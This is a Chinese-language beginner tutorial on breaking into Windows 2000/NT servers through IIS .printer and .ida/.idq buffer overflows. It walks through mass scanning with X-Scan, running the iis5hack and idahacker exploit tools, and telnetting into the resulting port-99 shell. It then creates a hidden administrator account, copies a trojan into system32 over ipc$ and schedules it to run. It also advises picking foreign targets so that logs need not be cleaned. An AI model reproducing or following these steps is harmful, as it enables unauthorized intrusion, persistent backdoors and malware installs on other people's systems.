教菜鸟入侵--溢出篇
这里说的入侵说得是2000或NT
首先,介绍几个要用的命令
-------------------------
net user rover rover1234 /add
在远程主机上创建用户rover密码rover1234(受限)
net localgroup administrators rover /add
把rover用户添道administrators组(这就成了超级管理员了)
注意:要使这两条命令成功,必须是ADMIN权限,TELNET登陆,QL的sa密码,IIS远程命令行,都可以的,但ipc$不行,因为~~这个~~好像ipc是本地shell吧,反正不可能啦
---------------------------------
net use \\ip\ipc$ "rover1234" /user:"rover"
建立ipc$链接 用户rover密码rover1234
copy rover.exe \\ip\admin$\system32
把根目录下的准备好的rover.exe传道远程主机system32目录下
netsvc \\ip schedule /start
用小榕的netsvc打开对方的时间服务(netsvc必须放在DOS根目录下)
net time
看时间^_^
at \\ip XX:XX rover.exe
在xx:xx
------------------------------
呵呵~这些都是获取可写权限后要打的命令
好了,不罗嗦了,唉,这是菜鸟教程,不要说我罗嗦,我是很努力要你们懂啊
现在说入侵
介绍一个扫描工具“X-SCANR”现在好像最新的是V2.3吧
随便扫上一段IP,10个ip 至少一半主机有漏洞,(建议扫外国的ip漏洞,安全、不用清日志^_^而且漏洞特多)
那么多的扫描选项!~~为了节省我们的时间和金钱 x-scanr 设置--》扫描模块--》把端口和iis漏洞打勾
其余的去掉,因为我下面介绍的是iis溢出漏洞 ,在扫描参数设置扫描IP断就可以工作了
我们要找得是--》
------------------------------
可能存在"IIS 5.0 .printer远程缓冲区溢出"漏洞
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq)
---------------------------------
只要能扫到这三个里面的一个,那么我们就有60%的成功机会了,呵呵~超级管理员A~
先说IIS 5.0 .printer漏洞,好像去年5月公布的,很有前途啊!
先http://www.sunx.org去下载一个几K的小工具 -iis5hacker.exe顺便也把idahacker.exe拉下来,一会儿要用
把这两个工具放在dos根目录下,因为是在dos下运行的
c:\document. and settings\rover\--这是我的默认dos目录,你把它放在rover文件夹里就可以调用
介绍一下iis5hacker的命令格式
iis5hack <目标主机IP> <主机类型><要溢出的端口>
中文WIN2K: 0
中文WIN2K sp1: 1
英文WIN2K: 2
英文WIN2K, sp1: 3
日文WIN2K: 4
日文WIN2K, sp1: 5
现在记好你扫到的那个IIS 5.0 .printer远程缓冲区溢出漏洞的IP,准备溢出
c:\document. and settings\rover\iss5hacker ip 80 0 99
如果显示--》
E:\HACK\print>iis5hack ip 80 3
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
Now you can telnet to 99 port
good luck :)
就说明你溢出成功了,可以从99端口telnet登录,恭喜
继续
c:\document. and settings\rover\telnet ip 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
看见了吧,进入远程主机了,呵呵,现在可是超级管理员权限啊~~这个溢出的99端口存活的时间很短,大概几分钟吧,创建用户足够了,用我前面介绍的net命令创建超级管理员~~
然后用ipc管道种木马,其实有比较简单的方法,流光自带一个ipc种植者,添上“ip 用户 密码 选择文件”
然后开始 就会自动植入运行
现在介绍下一个漏洞,这两个有一个就行了,一般他们是成对出现的^_^
---------------------------
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq)
-----------------------------
使用idahacker.exe
格式
idahacker <目标主机IP> <主机类型><要溢出的端口>
和iis5hacker差不多
主机类型你自己看,打入idahacker /?
eg.
c:\document. and settings\rover\idahacker ip 80 1 99
好了,下面不用我说吧。这个也是建立一个端口是99的telnet
还有很重要的一点你用上两种方法telnet上去,建立超级用户后一定要正常退出,不然iis会死掉
退出方法---》
C:\WINNT\system32>exit
就是用exit了,然后显示已断开与主机的连接,回到自己机子的提示符下了
|
|